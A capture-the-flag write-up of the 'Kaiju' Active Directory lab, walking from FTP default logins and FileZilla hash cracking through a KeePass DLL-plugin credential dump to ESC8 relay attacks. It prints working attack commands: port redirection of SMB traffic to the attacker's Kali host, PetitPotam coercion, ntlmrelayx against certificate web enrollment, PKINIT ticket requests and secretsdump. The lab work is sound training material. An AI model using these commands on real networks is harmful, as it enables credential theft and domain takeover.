Kaiju is a hard rated AD chain, involved enumerating FTP server with default credentials to find filezilla configuration file having the password hash, logging into BERSRV200 and finding filezilla server admin’s hash, changing the configuration to get access to sasrv200’s directory, further reading local administrator’s password by injecting DLL as a plugin in KeePass process, dumping lass to find a domain user, enumerating ADCS where web enrollment was enabled, with Port Bending redirecting all incoming traffic to kali machine, making it possible for the coercion and abusing ESC8.
BERSRV100.kaiju.vl
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-03T20:29:34+00:00; -10s from scanner time.
| rdp-ntlm-info:
| Target_Name: KAIJU
| NetBIOS_Domain_Name: KAIJU
| NetBIOS_Computer_Name: BERSRV100
| DNS_Domain_Name: kaiju.vl
| DNS_Computer_Name: BERSRV100.kaiju.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-03T20:29:30+00:00
| ssl-cert: Subject: commonName=BERSRV100.kaiju.vl
| Issuer: commonName=BERSRV100.kaiju.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-25T20:07:28
| Not valid after: 2024-06-25T20:07:28
| MD5: 6276d99a6b5df445831fb4edf399740b
|_SHA-1: e4d1f05a3c0acb5c6cbb96e4e8a5664a58ff5a7f
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsBERSRV200.kaiju.vl
21/tcp open ftp?
| ssl-cert: Subject: commonName=filezilla-server self signed certificate
| Issuer: commonName=filezilla-server self signed certificate
| Public Key type: ec
| Public Key bits: 256
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2023-12-17T14:33:49
| MD5: 96eb4628bac77bd6ad46b498002002fd
|_SHA-1: ad8550b5089e34a78bb9d8ef3a67668cc3dc5502
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| 220-FileZilla Server 1.8.0
| Please visit https://filezilla-project.org/
| GetRequest:
| 220-FileZilla Server 1.8.0
| Please visit https://filezilla-project.org/
| What are you trying to do? Go away.
| HTTPOptions, RTSPRequest:
| 220-FileZilla Server 1.8.0
| Please visit https://filezilla-project.org/
| Wrong command.
| Help:
| 220-FileZilla Server 1.8.0
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 08c7c66a51482a073f9e880ce2ff2cb9 (RSA)
| 256 7596f0688a0369abe49b3e5a17a8ab24 (ECDSA)
|_ 256 d48eadd323a97b7b7b169f86cbaba355 (ED25519)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BERSRV200.kaiju.vl
| Issuer: commonName=BERSRV200.kaiju.vlBERSRV105.kaiju.vl
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: KAIJU
| NetBIOS_Domain_Name: KAIJU
| NetBIOS_Computer_Name: BERSRV105
| DNS_Domain_Name: kaiju.vl
| DNS_Computer_Name: BERSRV105.kaiju.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-03T20:35:39+00:00
| ssl-cert: Subject: commonName=BERSRV105.kaiju.vl
| Issuer: commonName=BERSRV105.kaiju.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-20T14:50:42
| Not valid after: 2024-07-21T14:50:42
| MD5: 75ab9d8dcba8f772b61a263ae82b1cfa
|_SHA-1: 189c63c9071bab279700c2df14082b4931ce7724
|_ssl-date: 2024-03-03T20:35:44+00:00; -9s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsBERSRV200.kaiju.vl host has FTP service enabled, anonymous login didn't worked
Trying different logins from hacktricks
Here trying to login ftp worked and didn't required any password
From the passwords directory, we see few text files
We don’t get anything other than just hinting us that local administrators is saved in keepass, from the config directory, we have users.xml
Here we have a username backup with his password hash, searching for filezilla hashes on hashcat wiki showed a different hash which was for versions till 0.9.55
Searching on filezilla forums we can learn that PBKDF2-HMAC-SHA256 is used for hashing in version 1.8.0
This can be cracked in hashcat with mode 10900 by formatting the hash like this
iterations:base64 salt:base64 digetsWe just need to convert it into a proper format
sha256:100000:aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw:ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFUBut cracking this hash with rockyou.txt didn't worked as it was showing 20 hrs for this hash to be cracked
Getting a shell as backup user
So taking a hint from vulnlab forums, we may need to come up with a custom wordlist but what could we be the custom list, we know this is a password for backup user, from the ftp we had files including passwords like firewall123 so combining the year and name of the box we can create a list
kaiju123
kaiju
kaiju2023
kaiju2024
backup
backup2023
backup2024Also including hash cat rules to crack this hashcat
hashcat -a 0 -m 10900 ./hash.txt custom_list -r hob064.rule --forceNow we can ssh using backup user on BERSRV200.kaiju.vl host
Going back to filezilla configuration file, we can see there’s drive E:\
This drive has FIlezilla server directory, from the logs, this tells us that this server is running as sasrv200 user
And from the install.log we can find filezilla server's admin password hash
sha256:100000:AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18:mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8:This hash can also be cracked using the same list that we created
The port for administrator server is 14148, this can be checked from the logs
Abusing filezilla to escalate as SASRV200
Since this is running locally, we need to perform port forwarding through ssh
ssh -L 4444:localhost:14148 backup@BERSRV200.kaiju.vlUsing filezilla server version 1.8.0 (filezilla-server-gui) we can access the administrator interface on port 4444
But on interacting with anything it kept showing this error
We can still add our user by exporting the configuration file, then importing it again with the changes
Since this is being ran as sasrv200, changing the mount path to C:\Users\sasrv200
Accessing ftp with backup user, we’ll land into sasrv200 directory with write permissions
Here we can just create a .ssh folder, place our ssh public key and login as sasrv200
Reading local admin password through keepass
For escalating our privileges, we saw a note for local administrator password that it’s moved to KeePass, we can find it.kdbx from E:\ drive
Copying this file to sasrv200’s directory and then downloading it through FTP
Extracting john/hashcat hash format for cracking the password, but it didn’t worked as the hash was not crackable
Going back to keepass directory, there’s Plugins which is owned by sasrv200, we have write permissions
Checking the running process using Get-Process , we don't have anything related to keepass, but constantly monitoring for keepass we will keep seeing this process being spawned
while ($true) {
Clear-Host
Write-Host "Monitoring running processes containing 'keepass':"
$Process = Get-Process | Where-Object { $_.ProcessName -like '*keepass*' }
$Process | Format-Table -AutoSize
Start-Sleep -Seconds 1
}This could also be monitored through Winpspy but we can move on now that we know keepass is constantly being ran, since we have write access on plugins folder, to abuse this we need to compile a DLL which will export the credentials in keepass database once it gets injected in keepass process, also enabling plugins and export functionalities in KeePass.config.xml
For using KeeFarceReborn, we need to retrieve keepass.exe from the target machine, edit the source code to remove the message boxes and change the path where we want the xml file
Going to C:\ProgramData we'll find the export.xml file having the local admin password
Having the password we can login as local admin on BERSRV200, now to dump hashes we need to use ssh dynamic port forwarding as most of the ports are running locally
ssh administrator@BERSRV200 -D 1080In proxychains.conf, make sure to have the port which you have specified for dynamic port forwarding
Dumping lsass through lsassy module but due to defender being enabled this did not work
Since we already are local admin, we can just disable defender
Uploading sharphound.exe through ftp and running it with sasrv200’s plain text password
SharpHound.exe --ldapusername sasrv200 --ldappassword pass -d kaiju.vl -c allBloodhound doesn’t bring anything interesting apart From claire.forst can RDP into BERSRV200 which seems useless as we already have local admin on that host
But we can use this user to see if there’s ADCS server in this domain
proxychains nxc ldap BERSRV100.kaiju.vl -u Clare.Frost -H ':hash' -M adcsChecking for vulnerable templates through certipy
Abusing ESC8 Through Port Bending
This doesn’t show any vulnerable templates instead there’s web enrollment enabled which can be abused, known as ESC8 by performing coercion using any PoC on domain controller, relaying that machine account hash on ADCS server to get DC's ticket but the problem is we can't receive coercion if we ran it from our machine, so we need to redirect traffic coming on port 445 of BERSRV200 to a different port (port mapping/ port redirect) and then do remote/reverse port forward ( depending if we are redirecting the traffic locally). StreamDivert can be used here for port bending, transferring all required files via ftp, scp or by disabling firewall rules
We are going to redirect all traffic incoming on port 445 on to our kali IP, the config file for stream divert will look like this
tcp < 445 0.0.0.0 -> 10.8.0.136 445To confirm if we can perform coercion, start responder with smb set to On
Using PetitPotam for coercion
Now that we have confirmed that coercion is working, we can realy this authentication on ADCS server using ntlmrealyx also shutting smb and http server off from responder
proxychains ntlmrelayx.py -t http://BERSRV105.kaiju.vl/certsrv/certfnsh.asp -smb2support --adcs --template DomainControllerWe’ll receive DC’s certificate through which we can request the TGT or AES key of domain controller through PKINIT authentication and then perform DCsync
proxychains python3 /opt/PKINITtools/gettgtpkinit.py -pfx-base64 $(cat ./DC.b64) -dc-ip 10.10.210.133 kaiju.vl/'BERSRV100$' dc.ccacheUsing the TGT to dump administrator’s hash
proxychains secretsdump.py -k -no-pass kaiju.vl/'BERSRV100$'@BERSRV100.kaiju.vl